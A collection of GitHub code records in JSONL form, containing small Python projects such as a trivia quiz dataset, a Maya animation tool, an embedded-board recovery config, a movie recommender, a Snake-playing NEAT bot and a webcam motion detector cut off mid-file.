+{"seq_id":"17382909216","text":"import classes\n\nquestions_text = [\n \"Which is the largest country in the world?\",\n \"How many days are there in a leap year?\",\n \"Which one of these four birds has the longest beak and feet?\",\n \"What is the national currency of the United States of America (USA)?\",\n \"Guido van Rossum in 1991 designed which language?\",\n \"Finish the sequence: 9, 18, 27, _?\",\n \"Which one is the first fully supported 64-bit operating system?\",\n \"Which animal is called the king of the jungle?\",\n \"what time corresponds to 23:23 hours ?\",\n \"Which team has won most number of IPL matches ?\",\n \"Which is the largest planet in our Solar system?\",\n \"How many continents are there in the world?\",\n \"How many years are there in one Millenium?\",\n \"ipad is manufactured by?\",\n \"Who founded Microsoft?\",\n]\n\nfirst_option = [\n \"India\",\n \"354\",\n \"Heron\",\n \"Euro\",\n \"Javascript\",\n \"36\",\n \"Windows 7\",\n \"Elephant\",\n \"11:23PM\",\n \"KKR\",\n \"Earth\",\n \"8\",\n \"100 years\",\n \"Google\",\n \"Monty Ritz\",\n]\n\nsecond_option = [\n \"USA\",\n \"366\",\n \"Parrot\",\n \"Peso \",\n \"Python\",\n \"34\",\n \"Linux\",\n \"Lion\",\n \"11.11PM\",\n \"CSK\",\n \"Uranus\",\n \"5\",\n \"50 years\",\n \"Microsoft\",\n \"Danis Lio\",\n]\n\nthird_option = [\n \"China\",\n \"365\",\n \"Crow\",\n \"Dollar\",\n \"Java\",\n \"30\",\n \"Mac\",\n \"Tiger\",\n \"7:23PM\",\n \"MI\",\n \"Mars\",\n \"7\",\n \"500 years\",\n \"Amazon\",\n \"Bill Gates\",\n]\n\nfourth_option = [\n \"Russia\",\n \"420\",\n \"Pigeon\",\n \"Yen\",\n \"C++\",\n \"37\",\n \"Windows XP\",\n \"Cow\",\n \"9.11PM\",\n \"RCB\",\n \"Jupiter\",\n \"6\",\n \"1000 years\",\n \"Apple\",\n \"Jeff Bezos\",\n]\n\ncorrect_answers = [\n \"Russia\",\n \"366\",\n \"Heron\",\n \"Dollar\",\n \"Python\",\n \"36\",\n \"Linux\",\n \"Lion\",\n \"7:23PM\",\n \"MI\",\n \"Jupiter\",\n \"7\",\n \"1000 years\",\n \"Apple\",\n \"Bill Gates\",\n]\n\nquestions = []\n\nfor i in range(len(questions_text)):\n questions.append(\n classes.Question(\n questions_text[i],\n first_option[i],\n second_option[i],\n third_option[i],\n fourth_option[i],\n correct_answers[i],\n )\n )\n","repo_name":"Mannatpreet22/trivia-quiz","sub_path":"KBC Quiz Game/kbc_data.py","file_name":"kbc_data.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71486519688","text":"# coding=utf-8\nimport os\nfrom imp import reload\n\nfrom animation import common\nfrom pymel import core as pm\n\nreload(common)\n\n\nclass TransferAnimTool(common.Singleton):\n \"\"\"\n 动画传递工具\n\n 将旧版的表情动画传递到新版表情控制器面板上面的一次性工具\n\n \"\"\"\n\n def __init__(self):\n super(TransferAnimTool, self).__init__()\n\n self.template_path = \"\"\n self.namespace = \"\"\n\n self.initialize()\n self.show()\n\n def show(self):\n if pm.window(\"transferAnimTool\", ex=True):\n pm.deleteUI(\"transferAnimTool\")\n pm.window(\n \"transferAnimTool\",\n title=u\"动画传递助手\",\n cc=lambda *args: self.close_main_window())\n form_layout = pm.formLayout()\n\n layout = pm.columnLayout(adj=1, rs=5)\n pm.textFieldButtonGrp(\n \"templateTextField\",\n label=u\"模板文件\",\n bl=u\"指定文件\",\n cw3=[70, 200, 100],\n adj=2,\n text=self.template_path,\n bc=lambda *args: self.load_template_file())\n pm.textFieldGrp(\n \"namespaceTextField\",\n label=\"Namespace:\",\n cw2=[70, 200],\n adj=2,\n text=self.namespace,\n cc=lambda *args: self.set_namespace())\n pm.button(label=u\"传递动画!\", c=lambda *args: self.transfer_anim())\n pm.setParent(\"..\")\n\n pm.formLayout(\n form_layout, edit=True,\n attachForm=[\n (layout, 'top', 10),\n (layout, 'left', 10),\n (layout, 'right', 10),\n (layout, 'bottom', 10),\n # (btn, 'left', 10),\n # (btn, 'right', 10),\n\n # (output_frame, 'left', 10),\n # (output_frame, 'right', 10),\n # (output_frame, 'bottom', 10),\n ],\n attachControl=[\n # (btn, 'top', 5, layout),\n # (output_frame, 'top', 5, btn),\n # (file_export_list_frame, 'bottom', 5, export_options_frame),\n # (export_options_frame, 'bottom', 5, execute_button),\n ])\n\n pm.showWindow(\"transferAnimTool\")\n\n def close_main_window(self):\n pm.optionVar(sv=('transferAnimToolTemplatePath', self.template_path))\n pm.optionVar(sv=('transferAnimToolNamespace', self.namespace))\n\n def initialize(self):\n \"\"\"\n 初始化数据\n\n 从MAYA的保存的属性数据里面获取一些值\n\n :return:\n \"\"\"\n if pm.optionVar(q='transferAnimToolTemplatePath'):\n self.template_path = pm.optionVar(\n q='transferAnimToolTemplatePath')\n\n if pm.optionVar(q='transferAnimToolNamespace'):\n self.namespace = pm.optionVar(\n q='transferAnimToolNamespace')\n\n def load_template_file(self):\n json_location = pm.fileDialog2(\n dialogStyle=2, fileMode=1, okc=u\"选择模板配置文件\")\n if json_location:\n pm.textFieldButtonGrp(\n 'templateTextField', e=True, text=json_location[0])\n self.template_path = json_location[0]\n return\n\n def set_namespace(self):\n self.namespace = pm.textFieldGrp(\n \"namespaceTextField\", q=True, text=True)\n\n def transfer_anim(self):\n dict_data = common.read_json(file_path=self.template_path)\n print(dict_data)\n # print self.namespace\n source_attrs = dict_data.keys()\n print(source_attrs)\n for source_attr in source_attrs:\n source_anim_curves = pm.PyNode(\n \"%s%s\" % (self.namespace, source_attr)).inputs()\n if len(source_anim_curves) > 0:\n target_anim_curve = source_anim_curves[0].controller_name()\n # print target_anim_curve\n # print source_attr.split(\".\")[0]\n # print dict_data[source_attr].split(\".\")[0]\n target_anim_curve = target_anim_curve.replace(\n source_attr.split(\".\")[0],\n dict_data[source_attr].split(\".\")[0])\n\n new_anim_curve = pm.duplicate(\n source_anim_curves[0],\n name=target_anim_curve)\n\n pm.connectAttr(\n \"%s.output\" % new_anim_curve[0],\n \"%s%s\" % (self.namespace, dict_data[source_attr]),\n f=True)\n\n print(\"Done!\")\n\n return\n\n\nclass TemplateBuilder(common.Singleton):\n \"\"\"\n 属性传递模板创建工具\n\n 传递属性工具依赖属性模板(JSON)文件,\n 这个模板文件里面包含数据来源(source)对象控制器的名字和属性,\n 接受数据的目标(target)对象控制器的名字和属性\n\n \"\"\"\n\n def __init__(self):\n super(TemplateBuilder, self).__init__()\n\n self.output_path = \"\"\n self.namespace = \"\"\n self.output_items = []\n\n self.initialize()\n self.show()\n\n def initialize(self):\n \"\"\"\n 初始化数据\n\n 从MAYA的保存的属性数据里面获取一些值\n\n :return:\n \"\"\"\n if pm.optionVar(q='transferOutputPath'):\n self.output_path = pm.optionVar(\n q='transferOutputPath')\n\n if pm.optionVar(q='transferNamespace'):\n self.namespace = pm.optionVar(\n q='transferNamespace')\n\n def show(self):\n if pm.window(\"templateBuilder\", ex=True):\n pm.deleteUI(\"templateBuilder\")\n pm.window(\n \"templateBuilder\",\n title=u\"模板创建助手\", cc=lambda *args: self.close_main_window())\n form_layout = pm.formLayout()\n\n mode_options_grp = self.mode_options_grp()\n\n layout = pm.rowColumnLayout(nc=2, w=520)\n self.source_attr_list_column()\n self.target_attr_list_column()\n pm.setParent(\"..\")\n\n btn = pm.button(\n label=u\"自动比对\", w=504,\n c=lambda *args: self.comparison_attrs())\n\n output_frame = self.template_item_list()\n\n pm.formLayout(\n form_layout, edit=True,\n attachForm=[\n (mode_options_grp, 'top', 10),\n (mode_options_grp, 'left', 10),\n (layout, 'left', 10),\n (btn, 'left', 10),\n (output_frame, 'left', 10),\n (output_frame, 'bottom', 10)],\n attachControl=[\n (layout, 'top', 5, mode_options_grp),\n (btn, 'top', 5, layout),\n (output_frame, 'top', 5, btn)])\n\n pm.showWindow(\"templateBuilder\")\n\n def template_item_list(self):\n frame_layout = pm.frameLayout(label=\"Output Frame\", mh=5, w=504)\n pm.textFieldGrp(\n \"namespaceField\",\n adj=2, label=\"Namespace:\",\n cw2=[80, 200],\n text=self.namespace,\n cc=lambda *args: self.set_namespace())\n pm.textFieldButtonGrp(\n \"outputPathField\",\n label=\"Output Path:\",\n bl=\"Set Path\",\n adj=2,\n text=self.output_path,\n cw3=[80, 200, 100],\n bc=lambda *args: self.set_output_location())\n pm.textScrollList(\"outputItemScrollList\", a=self.output_items)\n pm.popupMenu()\n pm.menuItem(\n label=u\"载入数据\", c=lambda *args: self.load_dict_data())\n pm.menuItem(\n label=u\"移除选择\", c=lambda *args: self.remove_selected_item())\n pm.menuItem(\n label=u\"移除所有\", c=lambda *args: self.remove_all_item())\n pm.button(label=\"Build\", c=lambda *args: self.write_output())\n pm.setParent(\"..\")\n return frame_layout\n\n def mode_options_grp(self):\n options_grp = pm.optionMenuGrp(\n label=u'模式', cw2=[24, 200], adj=2)\n pm.menuItem(label=u'属性——属性')\n pm.menuItem(label=u'属性——对象')\n return options_grp\n\n def target_attr_list_column(self):\n pm.columnLayout(adj=1, rs=5)\n pm.text(label=u\"Target Object:\",\n al=\"left\")\n pm.textField(\"targetObjectField\", w=250)\n pm.textScrollList(\n \"targetObjectAttrScrollList\",\n sc=lambda *args: self.print_selected_item(\n widget=\"targetObjectAttrScrollList\"),\n dcc=lambda *args: self.append_output_item())\n pm.button(\n \"loadTargetBtn\",\n label=u\"Load Object\",\n c=lambda *args: self.load_controller(\n widget=\"targetObjectField\",\n extra_widget=\"targetObjectAttrScrollList\"))\n pm.setParent(\"..\")\n\n def source_attr_list_column(self):\n pm.columnLayout(adj=1, rs=5)\n pm.text(label=u\"Source Object:\",\n al=\"left\")\n pm.textField(\"sourceObjectField\", w=250)\n pm.textScrollList(\n \"sourceObjectAttrScrollList\",\n sc=lambda *args: self.print_selected_item(\n widget=\"sourceObjectAttrScrollList\"))\n pm.button(\n \"loadSourceBtn\",\n label=u\"Load Object\",\n c=lambda *args: self.load_controller(\n widget=\"sourceObjectField\",\n extra_widget=\"sourceObjectAttrScrollList\"))\n pm.setParent(\"..\")\n\n @staticmethod\n def remove_selected_item():\n selected_item = pm.textScrollList('outputItemScrollList', q=True,\n si=True)\n for item in selected_item:\n pm.textScrollList('outputItemScrollList', e=True, ri=item)\n # self.output_files = pm.textScrollList(\n # 'outputItemScrollList', q=True, ai=True)\n\n @staticmethod\n def remove_all_item():\n pm.textScrollList('outputItemScrollList', e=True, ra=True)\n # self.output_files = pm.textScrollList(\n # 'outputItemScrollList', q=True, ai=True)\n\n @staticmethod\n def load_controller(widget=None, extra_widget=None):\n controller = pm.ls(sl=True)\n if len(controller) > 1 or len(controller) < 1:\n pm.error(u\"请选择单个控制器\")\n else:\n pm.textField(widget, e=True, text=controller[0])\n\n attr_list = pm.listAttr(controller[0], k=True)\n pm.textScrollList(extra_widget, e=True, ra=True)\n pm.textScrollList(extra_widget, e=True, a=attr_list)\n\n @staticmethod\n def append_output_item():\n # todo: bug fix - 属性应该是一对一,当前是一对多,后续版本应该强制验证\n\n namespace = pm.textFieldGrp(\"namespaceField\", q=True, text=True)\n\n source_controller = pm.textField(\n \"sourceObjectField\", q=True, text=True)\n if namespace in source_controller:\n source_controller = source_controller.split(\":\")[1]\n key = \"%s.%s\" % (\n source_controller,\n pm.textScrollList(\n \"sourceObjectAttrScrollList\", q=True, si=True)[0]\n )\n\n target_controller = pm.textField(\n \"targetObjectField\", q=True, text=True)\n if namespace in target_controller:\n target_controller = target_controller.split(\":\")[1]\n value = \"%s.%s\" % (\n target_controller,\n pm.textScrollList(\n \"targetObjectAttrScrollList\", q=True, si=True)[0]\n )\n\n item = \"%s:%s\" % (key, value)\n print(item)\n\n current_items = pm.textScrollList(\n \"outputItemScrollList\", q=True, ai=True)\n if item not in current_items:\n pm.textScrollList(\"outputItemScrollList\", e=True, a=item)\n\n print(\"--------------\")\n\n def set_namespace(self):\n self.namespace = pm.textFieldGrp(\"namespaceField\", q=True, text=True)\n\n def set_output_location(self):\n output_path = pm.fileDialog2(\n dialogStyle=2,\n fileFilter=\"JSON File (*.json);;\",\n fileMode=0, okc=u\"保存文件\")\n if output_path:\n pm.textFieldButtonGrp(\n \"outputPathField\", e=True,\n text=output_path[0])\n self.output_path = output_path[0]\n return\n\n def close_main_window(self):\n pm.optionVar(sv=('transferOutputPath', self.output_path))\n pm.optionVar(sv=('transferNamespace', self.namespace))\n\n def write_output(self):\n output_map = {}\n\n output_items = pm.textScrollList(\n \"outputItemScrollList\", q=True, ai=True)\n for output_item in output_items:\n key, value = output_item.split(\":\")\n print(key, value)\n output_map[key] = value\n\n common.write_json(dict_data=output_map, file_path=self.output_path)\n\n print(\"Done!\")\n\n def load_dict_data(self):\n item_list = []\n if os.path.isfile(self.output_path):\n dict_data = common.read_json(file_path=self.output_path)\n for item_key in dict_data.keys():\n item_list.append(\"%s%s:%s%s\" % (\n self.namespace,\n item_key,\n self.namespace,\n dict_data[item_key]))\n pm.textScrollList(\"outputItemScrollList\", e=True, a=item_list)\n\n @staticmethod\n def print_selected_item(widget=None):\n print(pm.textScrollList(widget, q=True, si=True))\n\n @staticmethod\n def comparison_attrs():\n source_attrs = pm.textScrollList(\n \"sourceObjectAttrScrollList\", q=True, ai=True)\n target_attrs = pm.textScrollList(\n \"targetObjectAttrScrollList\", q=True, ai=True)\n\n comparison_attrs = list(\n set(source_attrs).intersection(set(target_attrs)))\n print(comparison_attrs)\n\n current_items = pm.textScrollList(\n \"outputItemScrollList\", q=True, ai=True)\n\n namespace = pm.textFieldGrp(\"namespaceField\", q=True, text=True)\n\n source_controller = pm.textField(\n \"sourceObjectField\", q=True, text=True)\n if namespace in source_controller:\n source_controller = source_controller.split(\":\")[1]\n\n target_controller = pm.textField(\n \"targetObjectField\", q=True, text=True)\n if namespace in target_controller:\n target_controller = target_controller.split(\":\")[1]\n\n for attr in comparison_attrs:\n key = \"%s.%s\" % (source_controller, attr)\n value = \"%s.%s\" % (target_controller, attr)\n item = \"%s:%s\" % (key, value)\n if item not in current_items:\n pm.textScrollList(\"outputItemScrollList\", e=True, a=item)\n","repo_name":"jzboylxj/XDLibs","sub_path":"animation/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":14613,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"20281370678","text":"import yaml\nfrom snagrecover.utils import cli_error,parse_usb\nimport logging\nlogger = logging.getLogger(\"snagrecover\")\nimport os\n\ndefault_usb_ids = {\n\t# default ROM code USB IDs\n\t\"stm32mp1\": (0x0483,0xdf11),\n\t\"sama5\": (0x03eb,0x6124),\n\t\"sunxi\": (0x1f3a,0xefe8),\n\t\"am62x\": (0x0451,0x6165),\n\t\"imx\": {\n\t\t\"imx8qxp\": (0x1fc9,0x012f),\n\t\t\"imx8qm\": (0x1fc9,0x0129),\n\t\t\"imx8dxl\": (0x1fc9,0x0147),\n\t\t\"imx28\": (0x15a2,0x004f),\n\t\t\"imx815\": (0x1fc9,0x013e),\n\t\t\"imx865\": (\"SDPS\",0x1fc9),\n\t\t\"imx93\": (0x1fc9,0x014e),\n\t\t\"imx7d\": (0x15a2,0x0076),\n\t\t\"imx6q\": (0x15a2,0x0054),\n\t\t\"imx6d\": (0x15a2,0x0061),\n\t\t\"imx6sl\": (0x15a2,0x0063),\n\t\t\"imx6sx\": (0x15a2,0x0071),\n\t\t\"imx6ul\": (0x15a2,0x007d),\n\t\t\"imx6ull\": (0x15a2,0x0080),\n\t\t\"imx6sll\": (0x1fc9,0x0128),\n\t\t\"imx7ulp\": (0x1fc9,0x0126),\n\t\t\"imxrt106x\": (0x1fc9,0x0135),\n\t\t\"imx8mm\": (0x1fc9,0x0134),\n\t\t\"imx8mq\": (0x1fc9,0x012b),\n\t\t\"imx53\" : (0x15a2,0x004e),\n\t}\n}\n\nrecovery_config = {} # Global immutable config to be initialized with CLI args\n\ndef get_family(soc_model: str) -> str:\n with open(os.path.dirname(__file__) + \"/supported_socs.yaml\", \"r\") as file:\n socs = yaml.safe_load(file)\n family = {**socs[\"tested\"], **socs[\"untested\"]}[soc_model][\"family\"]\n return family\n\ndef check_soc_model(soc_model: str):\n\twith open(os.path.dirname(__file__) + \"/supported_socs.yaml\", \"r\") as file:\n\t\tsocs = yaml.safe_load(file)\n\tif soc_model not in {**socs[\"tested\"], **socs[\"untested\"]}:\n\t\tcli_error(f\"unsupported soc model {soc_model}, supported socs: \\n\" + yaml.dump(socs))\n\treturn None\n\ndef init_config(args: list):\n\t# this is the only time that config.recovery_config should be modified!\n\t# get soc model\n\tsoc_model = args.soc\n\tcheck_soc_model(soc_model)\n\trecovery_config.update({\"soc_model\": soc_model})\n\tsoc_family = get_family(soc_model)\n\trecovery_config.update({\"soc_family\": soc_family})\n\tif soc_family != \"am335x\":\n\t\tif args.rom_usb is None:\n\t\t\tif soc_family == \"imx\":\n\t\t\t\trecovery_config[\"rom_usb\"] = default_usb_ids[\"imx\"][soc_model]\n\t\t\telse:\n\t\t\t\trecovery_config[\"rom_usb\"] = default_usb_ids[soc_family]\n\t\telse:\n\t\t\trecovery_config[\"rom_usb\"] = parse_usb(args.rom_usb)\n\n\tfw_configs = {}\n\tif args.firmware:\n\t\tfor fw in args.firmware:\n\t\t\tif not isinstance(fw, dict):\n\t\t\t\tcli_error(\"firmware config to CLI did not evaluate to Python3 dict: {fw}\")\n\t\t\tfw_configs = {**fw_configs, **fw}\n\t\trecovery_config[\"firmware\"] = fw_configs\n\t\tif args.firmware_file:\n\t\t\tprint(\"Warning: You passed firmware configuration via files AND direct CLI arguments.\")\n\tif args.firmware_file:\n\t\t# get firmware configs\n\t\tfor path in args.firmware_file:\n\t\t\twith open(path, \"r\") as file:\n\t\t\t\tfw_configs = {**fw_configs, **yaml.safe_load(file)}\n\t\tif not isinstance(fw_configs, dict):\n\t\t\tcli_error(f\"firmware config passed to CLI did not evaluate to dict: {fw_configs}\")\n\t\trecovery_config[\"firmware\"] = fw_configs\n\n\t# store input arguments in config\n\trecovery_config[\"args\"] = vars(args)\n\tlogger.debug(f\"recovery_config:{str(recovery_config)}\")\n\n","repo_name":"bootlin/snagboot","sub_path":"src/snagrecover/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"16"}
+{"seq_id":"5054389047","text":"import luserver.scripts.general.flower as script\r\nfrom luserver.components.mission import TaskType\r\n\r\nclass ScriptComponent(script.ScriptComponent):\r\n\tdef on_skill_event(self, caster, event_name):\r\n\t\tif event_name == \"waterspray\":\r\n\t\t\tif \"blooming\" not in self.script_network_vars:\r\n\t\t\t\tself.object.physics.drop_loot(12317, caster)\r\n\t\t\t\tcaster.char.mission.update_mission_task(TaskType.Script, self.object.lot, mission_id=1136)\r\n\r\n\t\tsuper().on_skill_event(caster, event_name)\r\n","repo_name":"lcdr/luserver","sub_path":"luserver/scripts/crux_prime/aura_blossom_flower.py","file_name":"aura_blossom_flower.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"16"}
+{"seq_id":"40700159998","text":"from typing import List\n\n\nclass AverageOfSubarrayOfSizeK:\n # Time complexity: O(N * K)\n def findAveragesBruteForce(self, k: int, arr: List[int]) -> List[float]:\n result = []\n for i in range(len(arr) - k + 1):\n _sum = 0\n for j in range(i, i + k):\n _sum += arr[j]\n result.append(_sum / k)\n return result\n\n # Time complexity: O(N)\n def findAverages(self, k: int, arr: List[int]) -> List[float]:\n result = []\n _sum = 0\n for i in range(len(arr)):\n _sum += arr[i]\n if i >= k - 1:\n result.append(_sum / k)\n _sum -= arr[i - k + 1]\n\n return result\n\n\nif __name__ == \"__main__\":\n print(AverageOfSubarrayOfSizeK().findAverages(\n 5, [1, 3, 2, 6, -1, 4, 1, 8, 2]))\n print(AverageOfSubarrayOfSizeK().findAveragesBruteForce(\n 5, [1, 3, 2, 6, -1, 4, 1, 8, 2]))\n","repo_name":"DenysLins/code-interview","sub_path":"patterns-for-coding-interview/sliding-window/introduction.py","file_name":"introduction.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1821189371","text":"import tkinter as tk\r\nimport sounddevice as sd\r\nimport wavio\r\nimport os\r\nfrom datetime import datetime\r\n\r\nclass VoiceRecorderApp:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"Voice Recorder App\")\r\n\r\n self.is_recording = False\r\n self.recording_filename = None\r\n\r\n # UI components\r\n self.record_button = tk.Button(root, text=\"Record\", command=self.toggle_recording)\r\n self.record_button.pack(pady=10)\r\n\r\n self.save_button = tk.Button(root, text=\"Save Recording\", command=self.save_recording, state=tk.DISABLED)\r\n self.save_button.pack(pady=5)\r\n\r\n # Start the GUI event loop\r\n root.protocol(\"WM_DELETE_WINDOW\", self.on_closing)\r\n root.mainloop()\r\n\r\n def toggle_recording(self):\r\n if not self.is_recording:\r\n self.start_recording()\r\n else:\r\n self.stop_recording()\r\n\r\n def start_recording(self):\r\n self.is_recording = True\r\n self.record_button.config(text=\"Stop Recording\")\r\n self.save_button.config(state=tk.DISABLED)\r\n\r\n # Set up audio recording\r\n self.recording_filename = f\"/Users\\logan\\Desktop{datetime.now().strftime('%Y%m%d_%H%M%S')}.wav\"\r\n self.stream = sd.InputStream(callback=self.audio_callback)\r\n self.stream.start()\r\n\r\n def stop_recording(self):\r\n self.is_recording = False\r\n self.record_button.config(text=\"Record\")\r\n self.save_button.config(state=tk.NORMAL)\r\n\r\n # Stop audio recording\r\n self.stream.stop()\r\n self.stream.close()\r\n\r\n def audio_callback(self, indata, frames, time, status):\r\n if status:\r\n print(status)\r\n wavio.write(self.recording_filename, indata, 44100, sampwidth=3)\r\n\r\n def save_recording(self):\r\n save_path = tk.filedialog.asksaveasfilename(defaultextension=\".wav\", filetypes=[(\"WAV files\", \"*.wav\")])\r\n if save_path:\r\n os.rename(self.recording_filename, save_path)\r\n tk.messagebox.showinfo(\"Save Recording\", \"Recording saved successfully!\")\r\n\r\n def on_closing(self):\r\n if self.is_recording:\r\n self.stop_recording()\r\n self.root.destroy()\r\n\r\nif __name__ == \"__main__\":\r\n root = tk.Tk()\r\n app = VoiceRecorderApp(root)\r\n","repo_name":"Mxlzz31/CVIP","sub_path":"voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"11811999918","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.metrics import pairwise\nfrom scipy.sparse import csr_matrix\nimport sklearn\nimport pickle\nfrom utils import make_user_vector\n\nimport os\n#%%\n# movie given by the user\nquery = {\n # movieId, rating\n 4470:5,\n 48:5,\n 594:5,\n 27619:5,\n 152081:5,\n 595:5,\n 616:5,\n 1029:5\n}\n\n#%%\nratings = pd.read_csv('data/ratings.csv')\nmovies = pd.read_csv('data/movies.csv')\n#%%\nmovies.set_index('movieId').loc[query.keys()]\n#%%\nratings_per_movie = ratings.groupby('movieId')['rating'].count()\npopular_movies = ratings_per_movie[ratings_per_movie>30]\nratings = ratings.loc[ratings['movieId'].isin(popular_movies.index)]\nR = csr_matrix((ratings['rating'], (ratings['userId'], ratings['movieId'])))\n#%%Training\nsorted(sklearn.neighbors.VALID_METRICS_SPARSE['brute'])\n#%%\nmodel_nn = NearestNeighbors(metric='cosine')\nmodel_nn.fit(R)\n\n#%%Save the trained model\nwith open('./nn_recommender.pkl', 'wb') as file:\n pickle.dump(model_nn, file)\n\n#%%read the model from hard drive\nwith open('./nn_recommender.pkl', 'rb') as file:\n model_nn = pickle.load(file)\n\n#%%\nshape = model_nn.n_features_in_\nuser_vec = make_user_vector(query, shape)\n\n#%%calculate the score\ndistances, userIds = model_nn.kneighbors(user_vec, n_neighbors=10, return_distance=True)\ndistances = distances[0]\nuserIds = userIds[0]\n\n#%% extract the ratings of the similar users from the original data\nneighborhood = ratings.set_index('userId').loc[userIds]\n\n#%%score calculation\nscores = neighborhood.groupby('movieId')['rating'].mean()\n\n#%% give recommendations\nscores.loc[scores.index.isin(query.keys())] = 0\nscores.sort_values(ascending=False, inplace=True)\n#%%\nscores_10 = scores.head(10)\nrecommendations = movies.set_index('movieId').loc[scores_10.index]","repo_name":"damoon15/movie_recommander","sub_path":"model_train_neighborhood_recommender.py","file_name":"model_train_neighborhood_recommender.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42937621482","text":"\"\"\"\nCode to watch the best bot play Snake\n\"\"\"\nimport pickle\nimport game, bot\nimport neat\nimport numpy as np\n\ndef preset_food_pos_maker(positions):\n \"\"\"\n Returns a function that returns the next position in :positions: each time it's called\n :param positions: list of tuples\n :return: function with no args\n \"\"\"\n pos = positions\n def preset_food_pos():\n try:\n return pos.pop(0)\n except Exception:\n print('out of given positions; using random ones')\n return game.rand_pos()\n return preset_food_pos\n\ndef watch_best(genome_file, config_file, food_pos_file):\n \"\"\"\n Watch a particularly good game of Snake\n \"\"\"\n # Import best game data\n genome = pickle.load(open(genome_file, 'rb'))\n config = pickle.load(open(config_file, 'rb'))\n food_positions = pickle.load(open(food_pos_file, 'rb'))\n\n # Generate model from best genome\n model = neat.nn.FeedForwardNetwork.create(genome, config)\n\n ## Play game\n # Must be true to observe game being played\n game.WATCH = True\n game.USE_FRAMERATE = True\n\n # Functions that control movement of snake and positioning of food\n snake_controller = bot.bot_mover_maker(model)\n food_controller = preset_food_pos_maker(food_positions)\n\n print('Score:', game.play(snake_controller, food_controller))\n\n\n\n\ndef watch_games(genome_file, config_file):\n \"\"\"\n Loads the given genome from file and plays Snake repeatedly, using that genome to control the bot\n :param genome_file: name of genome file\n \"\"\"\n # Import best genome data\n genome = pickle.load(open(genome_file, 'rb'))\n config = pickle.load(open(config_file, 'rb'))\n\n # Generate model from best genome\n model = neat.nn.FeedForwardNetwork.create(genome, config)\n\n # Must be true to observe game being played\n # game.WATCH = True\n # game.USE_FRAMERATE = True\n\n\n # Functions that control movement of snake and positioning of food\n snake_controller = bot.bot_mover_maker(model)\n food_controller = game.rand_pos\n\n while True:\n print('Score:', game.play(snake_controller, food_controller))\n\n\n\ngame.FRAMERATE = 30\nwatch_best('best_genome.pkl', 'best_config.pkl', 'best_food_pos.pkl')\nwatch_games('best_genome.pkl', 'best_config.pkl')","repo_name":"nglaze00/Snake-reinforcement-learning","sub_path":"watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"7567085767","text":"from multiprocessing import Process, Manager\nimport Evtx.Evtx as evtx\nfrom bs4 import BeautifulSoup\n\npath = \"C:\\Windows\\System32\\winevt\\Logs\\Security.evtx\"\nEventCount = 0\nAllEvent = 0\nwith evtx.Evtx(path) as log:\n for x in log.records():\n AllEvent +=1\n\ndef CountTotal(d,MinNum,MaxNum):\n global EventCount\n print(MinNum,MaxNum)\n try:\n with evtx.Evtx(path) as log:\n for y in range(MinNum, MaxNum):\n print(\"Numbering : \",y)\n GetOne = log.get_record(1)\n print(GetOne)\n # GetOne = log.get_record(int(y))\n # soup = BeautifulSoup(GetOne.xml(), \"html.parser\")\n # System_ = soup.find(\"system\")\n # EventId = int(System_.find(\"eventid\").text)\n # if EventId == 4624:\n # EventCount += 1\n # print(\"EvsentCount\", EventCount)\n # d[0] += EventCount\n except Exception as e:\n print(e)\n\nif __name__ == '__main__':\n with Manager() as manager:\n d = manager.list([0 for i in range(5)])\n print(AllEvent)\n\n p1 = Process(target=CountTotal, args=(d,1,13325))\n # p2 = Process(target=CountTotal, args=(d,13325,AllEvent-13325))\n p1.start()\n # p2.start()\n\n p1.join()\n # p2.join()\n\n print(d)\n\n","repo_name":"jak010/study-python-src","sub_path":"etc/ExampleGroup/MultiProcessing/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"17373806353","text":"import numpy as np\r\nimport cv2\r\nimport pandas,time\r\nfrom datetime import datetime\r\nfirst_frame=None\r\nstatus_list=[None,None]\r\ntimes=[]\r\ndf=pandas.DataFrame(columns=[\"Start\",\"End\"])\r\nvid = cv2.VideoCapture(0)\r\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\nwhile True:\r\n check, frame = vid.read()\r\n status=0\r\n gray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\r\n gray=cv2.GaussianBlur(gray,(21,21),0)\r\n\r\n if first_frame is None:\r\n first_frame=gray\r\n continue\r\n\r\n delta_frame=cv2.absdiff(first_frame,gray)\r\n thresh_frame=cv2.threshold(delta_frame, 30, 255, cv2.THRESH_BINARY)[1]\r\n thresh_frame=cv2.dilate(thresh_frame, None, iterations=2)\r\n\r\n (_,cnts,_)=cv2.findContours(thresh_frame.copy(),cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n for contour in cnts:\r\n if cv2.contourArea(contour) < 10000:\r\n continue\r\n status=1\r\n\r\n (x, y, w, h)=cv2.boundingRect(contour)\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0,255,0), 3)\r\n status_list.append(status)\r\n\r\n status_list=status_list[-2:]\r\n\r\n\r\n if status_list[-1]==1 and status_list[-2]==0:\r\n times.append(datetime.now())\r\n if 